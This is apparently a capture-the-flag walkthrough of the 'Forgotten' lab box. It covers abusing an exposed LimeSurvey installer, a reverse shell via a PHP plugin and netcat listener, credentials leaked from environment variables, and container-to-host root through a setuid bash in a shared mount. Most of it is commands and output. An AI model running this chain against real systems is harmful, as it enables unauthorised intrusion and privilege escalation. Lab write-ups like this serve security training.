Here is my notes on FORGOTTEN box from Vulnlab which deployed to Hackthebox.
FORGOTTEN: 10.10.98.134
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 72215a992f4bae07c280dec482161e10 (ECDSA)
|_ 256 a73d80fa9d931aa17e144620464df19e (ED25519)
80/tcp open http Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 403 Forbidden
/survey - Interesting
http://10.10.98.134/survey/index.php?r=installer/welcome
LimeSurvey Installation Process.
LimeSurvey 6.3.7
Able to create and change admin password and owned admin privilege of LimeSurvey.
mysql error because the target doesn't have one.
So we create a mysql database and have the target point to it and create an admin user there.
https://insecure.ninja/posts/forgotten/
https://dan-feliciano.com/2024/06/05/forgotten/
Bash Script:
#!/bin/bash
# Configuration
DB_NAME="limesurveydb"
DB_USER="limesurveyuser"
DB_PASSWORD="lime"
BIND_ADDRESS="0.0.0.0" # Change this to a specific IP address if needed
REMOTE_IP="%" # Change this to the specific remote IP or use '%' for all IPs
# Function to check the success of each operation
check_success() {
if [ $? -ne 0 ]; then
echo "Error during: $1"
exit 1
fi
}
# Update the system and install MariaDB Server
echo "Updating the system and installing MariaDB Server..."
sudo apt update
sudo apt install -y mariadb-server
check_success "MariaDB Server installation"
# Configure MariaDB to listen on all network interfaces
echo "Configuring MariaDB to listen on all network interfaces..."
sudo sed -i "s/^bind-address.*/bind-address = $BIND_ADDRESS/" /etc/mysql/mariadb.conf.d/50-server.cnf
check_success "Updating bind-address"
# Restart MariaDB service to apply changes
echo "Restarting MariaDB service..."
sudo systemctl restart mariadb
check_success "MariaDB restart"
# Create the MariaDB database and user
echo "Creating MariaDB database and user..."
sudo mariadb -u root -e "
CREATE DATABASE $DB_NAME;
CREATE USER '$DB_USER'@'$REMOTE_IP' IDENTIFIED BY '$DB_PASSWORD';
GRANT SELECT, CREATE, INSERT, UPDATE, DELETE, ALTER, DROP, INDEX ON $DB_NAME.* TO '$DB_USER'@'$REMOTE_IP';
FLUSH PRIVILEGES;"
check_success "Database and user creation"
# Optionally configure the firewall to allow traffic on port 3306
echo "Configuring firewall to allow traffic on port 3306..."
sudo ufw allow 3306/tcp
check_success "Firewall configuration"
echo "Installation and configuration completed successfully!"
admin:admin
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://dan-feliciano.com/2024/06/05/forgotten/
http://10.10.98.134/survey/upload/plugins/Y1LD1R1M/php-rev.php
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.98.134] 46904
Linux efaa6f5097ed 6.2.0-1012-aws #12~22.04.1-Ubuntu SMP Thu Sep 7 14:01:24 UTC 2023 x86_64 GNU/Linux
20:12:53 up 1:05, 0 users, load average: 0.00, 0.02, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
limesvc
$ hostname
efaa6f5097ed
USER-SHELL !
Althrough We are in docker environment.
$ pwd
/
$ ls -lah
total 80K
drwxr-xr-x 1 root root 4.0K Dec 2 2023 .
drwxr-xr-x 1 root root 4.0K Dec 2 2023 ..
-rwxr-xr-x 1 root root 0 Dec 2 2023 .dockerenv
drwxr-xr-x 1 root root 4.0K Dec 2 2023 bin
[SNIP]
Docker Escape:
$ env
APACHE_CONFDIR=/etc/apache2
HOSTNAME=efaa6f5097ed
[SNIP]
APACHE_LOG_DIR=/var/log/apache2
LIMESURVEY_PASS=5W5HN4K4GCXf9E
PWD=/var/www/html
limesvc:5W5HN4K4GCXf9E
ssh limesvc@10.10.98.134
[SNIP]
limesvc@ip-10-10-200-233:~$ whoami
limesvc
limesvc@ip-10-10-200-233:~$ hostname
ip-10-10-200-233
python3 -c 'import pty; pty.spawn("/bin/bash")'
REGULAR USER-SHELL after escaping docker environment !
limesvc@ip-10-10-200-233:~$ whoami
limesvc
limesvc@ip-10-10-200-233:~$ pwd
/home/limesvc
limesvc@ip-10-10-200-233:~$ cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
no sudo -l.
no /etc/crontab, /etc/crontab* and /etc/cron.d
no gcc
no SUID
no getcap
no kernel exploits.
LINPEAS:
[+] Checking if runc is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ls
Y1LD1R1M index.html
Looks like /opt/limesurvey in host = /var/www/html/survey in Docker Environment.
Going back to docker environment and try to use the limesurvey password:
script -qc /bin/bash /dev/null
$ pwd
/var/www/html/survey
$ script -qc /bin/bash /dev/null
limesvc@efaa6f5097ed:/var/www/html/survey$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for limesvc: 5W5HN4K4GCXf9E
Matching Defaults entries for limesvc on efaa6f5097ed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User limesvc may run the following commands on efaa6f5097ed:
(ALL : ALL) ALL
limesvc@efaa6f5097ed:/var/www/html/survey$ sudo su
sudo su
ROOT SHELL in DOCKER !.
Now as a root in Docker, we can copy and paste /bin/bash then put make it as malicious and execute it in the host to gain a root shell.
ROOT-DOCKER:
root@efaa6f5097ed:/var/www/html/survey/upload/plugins# cp /bin/bash .
cp /bin/bash .
root@efaa6f5097ed:/var/www/html/survey/upload/plugins# ls
ls
Y1LD1R1M bash index.html
root@efaa6f5097ed:/var/www/html/survey/upload/plugins# chmod u+s bash
chmod u+s bash
HOST:
limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ls
Y1LD1R1M bash index.html
limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ./bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=2000(limesvc) gid=2000(limesvc) euid=0(root) groups=2000(limesvc)
ROOT-SHELL !
bash-5.1# cd /root
bash-5.1# ls
root.txt snap
bash-5.1# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel